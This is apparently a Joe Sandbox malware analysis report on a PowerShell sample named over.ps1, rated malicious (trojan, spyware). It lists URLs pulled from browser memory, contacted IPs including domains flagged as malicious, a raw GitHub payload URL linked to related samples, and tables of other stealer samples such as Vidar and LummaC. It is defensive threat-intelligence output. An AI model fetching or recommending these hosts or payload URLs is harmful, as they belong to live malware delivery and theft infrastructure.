                                                                                                                                                                                                  http://anglebug.com/7556chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refk6fcj5.17.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://chromewebstore.google.com/msedge.exe, 00000019.00000002.2626560437.00007A640017C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000002.2786304098.000065100017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.31.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://drive-preprod.corp.google.com/manifest.json0.31.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://srtb.msn.cn/2cc80dabc69f58b6_1.31.drfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477k6fcj5.17.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://msn.comXIDv10Cookies.32.drfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://chrome.google.com/webstore/manifest.json.31.drfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.31.drfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/%chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://browser.events.data.msn.com/2cc80dabc69f58b6_1.31.drfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            http://anglebug.com/6692chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://issuetracker.google.com/258207403msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                http://saaadnesss.shoppowershell.exe, 00000000.00000002.2133357506.000002410224A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                http://anglebug.com/3502chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  http://anglebug.com/3623msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    http://anglebug.com/3625msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      http://anglebug.com/3624msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        http://anglebug.com/5007chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYik6fcj5.17.drfalse
                                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                                            http://anglebug.com/3862chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                                              https://ntp.msn.com/edge/ntp000003.log.31.dr, 2cc80dabc69f58b6_1.31.drfalse
                                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                                https://assets.msn.com/resolver/2cc80dabc69f58b6_1.31.drfalse
                                                                                                                                                                                                                                                  		high

                                                                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                  162.159.61.3
                                                                                                                                                                                                                                                  		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  185.199.109.133
                                                                                                                                                                                                                                                  		raw.githubusercontent.comNetherlands
                                                                                                                                                                                                                                                  		54113FASTLYUSfalse
                                                                                                                                                                                                                                                  20.110.205.119
                                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                  142.250.184.228
                                                                                                                                                                                                                                                  		www.google.comUnited States
                                                                                                                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                  185.121.235.167
                                                                                                                                                                                                                                                  		saaadnesss.shopSpain
                                                                                                                                                                                                                                                  		198432IPCORE-ASEStrue
                                                                                                                                                                                                                                                  23.44.203.195
                                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                  23.209.72.29
                                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                  239.255.255.250
                                                                                                                                                                                                                                                  		unknownReserved
                                                                                                                                                                                                                                                  		unknownunknownfalse
                                                                                                                                                                                                                                                  116.203.14.4
                                                                                                                                                                                                                                                  		sdoout.lolGermany
                                                                                                                                                                                                                                                  		24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                                  18.244.18.27
                                                                                                                                                                                                                                                  		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                  149.154.167.99
                                                                                                                                                                                                                                                  		t.meUnited Kingdom
                                                                                                                                                                                                                                                  		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                                  18.238.49.52
                                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                  142.250.184.206
                                                                                                                                                                                                                                                  		plus.l.google.comUnited States
                                                                                                                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                  204.79.197.219
                                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                                  		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                  172.64.41.3
                                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  23.44.203.175
                                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                  104.46.162.225
                                                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                  34.160.111.145
                                                                                                                                                                                                                                                  		ifconfig.meUnited States
                                                                                                                                                                                                                                                  		2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                                                  142.250.186.65
                                                                                                                                                                                                                                                  		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                                  		15169GOOGLEUSfalse

                                                                                                                                                                                                                                                  Private

                                                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                                                  192.168.2.5
                                                                                                                                                                                                                                                  127.0.0.1

                                                                                                                                                                                                                                                  General Information

                                                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                  Analysis ID:1582851
                                                                                                                                                                                                                                                  Start date and time:2024-12-31 16:57:19 +01:00
                                                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                  Overall analysis duration:0h 8m 41s
                                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                  Number of analysed new started processes analysed:43
                                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                                  Sample name:over.ps1
                                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                                  Classification:mal100.troj.spyw.expl.evad.winPS1@110/314@32/21
                                                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                                                  • Successful, ratio: 90%
                                                                                                                                                                                                                                                  • Number of executed functions: 48
                                                                                                                                                                                                                                                  • Number of non-executed functions: 36
                                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                                  • Found application associated with file extension: .ps1

                                                                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 217.20.57.40, 192.229.221.95, 142.250.184.195, 142.250.185.110, 74.125.71.84, 142.250.186.46, 142.250.185.195, 142.250.181.238, 216.58.206.74, 216.58.212.138, 172.217.23.106, 172.217.16.202, 216.58.212.170, 142.250.186.74, 142.250.186.170, 142.250.185.138, 142.250.185.74, 142.250.184.234, 142.250.185.106, 142.250.186.106, 142.250.185.234, 142.250.185.170, 172.217.18.106, 142.250.185.202, 184.28.90.27, 142.250.181.234, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 216.58.212.174, 13.107.6.158, 2.16.168.113, 2.16.168.107, 48.209.162.134, 88.221.110.195, 88.221.110.179, 2.23.209.179, 2.23.209.185, 2.23.209.176, 2.23.209.189, 2.23.209.182, 2.23.209.130, 2.23.209.187, 2.23.209.140, 2.23.209.133, 13.74.129.1, 13.107.21.237, 204.79.197.237, 2.23.209.25, 2.23.209.28, 2.23.209.33, 2.23.209.36, 2.23.209.35, 2.23.209.26, 2.23.209.30, 2.23.209.34, 2.23.209.29, 172.205.25.163, 2.16.168.115, 2.16.168.122, 23.200.0.34, 23.200.0.6, 142.250.80.35, 142.250.80.99, 142.250
                                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, www.gstatic.com, prod-agic-ne-9.northeurope.cloudapp.azure.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.tr
                                                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 4956 because it is empty
                                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                                                  10:58:08API Interceptor43x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                  10:58:17API Interceptor1x Sleep call for process: hyf04rot.rhn.exe modified
                                                                                                                                                                                                                                                  10:58:23API Interceptor1x Sleep call for process: Stopped.com modified
                                                                                                                                                                                                                                                  10:58:52API Interceptor2x Sleep call for process: svchost.exe modified

                                                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  162.159.61.3MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        Bp4LoSXw83.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            sysmonconfig.xmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                FLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                    aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      185.199.109.133cr_asm3.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                                                                      gabe.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                                                                      5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                                                                      HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                                                                      steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                                                                      OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                                                                      steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                                                                      SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                                                                                                                                                                                      SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt

                                                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                      t.meMatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      https://linkenbio.net/59125/247Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                      chrome.cloudflare-dns.comMJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 162.159.61.3
                                                                                                                                                                                                                                                                      MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                                                                      6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 162.159.61.3
                                                                                                                                                                                                                                                                      Bp4LoSXw83.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                                                                      BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                                                                      sysmonconfig.xmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                                                                      Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                                                                      FLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                                                                      JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                                                                      T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                                                                      raw.githubusercontent.comEpsilon.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                                                                                                                      eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                                                                      Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                                                                                                      Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                                                                                                      Supplier.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                                                                      Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                                                                                                                      NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                                                                                                                      fxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                                                                                                      OiMp3TH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                                                                                                      8lOT1rXZp5.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                                                                                                                      sdoout.lolMatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 116.203.14.4
                                                                                                                                                                                                                                                                      6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 116.203.14.4
                                                                                                                                                                                                                                                                      BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 116.203.14.4

                                                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                      MICROSOFT-CORP-MSN-AS-BLOCKUShttp://knoxoms.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 13.107.246.67
                                                                                                                                                                                                                                                                      2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 13.107.246.44
                                                                                                                                                                                                                                                                      bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 13.107.246.44
                                                                                                                                                                                                                                                                      6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 204.79.197.219
                                                                                                                                                                                                                                                                      https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                                      • 13.107.42.14
                                                                                                                                                                                                                                                                      kwari.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 20.170.140.15
                                                                                                                                                                                                                                                                      kwari.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 20.239.229.213
                                                                                                                                                                                                                                                                      kwari.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 52.241.5.244
                                                                                                                                                                                                                                                                      BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 204.79.197.219
                                                                                                                                                                                                                                                                      botx.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 20.153.214.5
                                                                                                                                                                                                                                                                      IPCORE-ASEShttps://www.tblgroup.com/tbl2/certificados-digitales/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                                                      • 185.121.235.167
                                                                                                                                                                                                                                                                      reduce.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                                                                                                                                      • 185.121.233.152
                                                                                                                                                                                                                                                                      m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                                                                                                                                      • 185.121.233.152
                                                                                                                                                                                                                                                                      Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 185.18.198.253
                                                                                                                                                                                                                                                                      Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 185.18.198.253
                                                                                                                                                                                                                                                                      SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                      • 185.18.198.253
                                                                                                                                                                                                                                                                      n1KVzXM8Wk.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                      • 185.18.198.253
                                                                                                                                                                                                                                                                      PO #1131011152-2024-Order,pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                      • 185.18.198.253
                                                                                                                                                                                                                                                                      SecuriteInfo.com.Win64.ExploitX-gen.17969.12173.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                      • 185.18.198.253
                                                                                                                                                                                                                                                                      Scan 20.02.24.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                      • 185.18.198.253
                                                                                                                                                                                                                                                                      CLOUDFLARENETUShttp://trezorbridge.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 104.16.79.73
                                                                                                                                                                                                                                                                      http://knoxoms.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                                                                      EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                                                                      SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.48.1
                                                                                                                                                                                                                                                                      DypA6KbLrn.lnkGet hashmaliciousUnknownBrowse
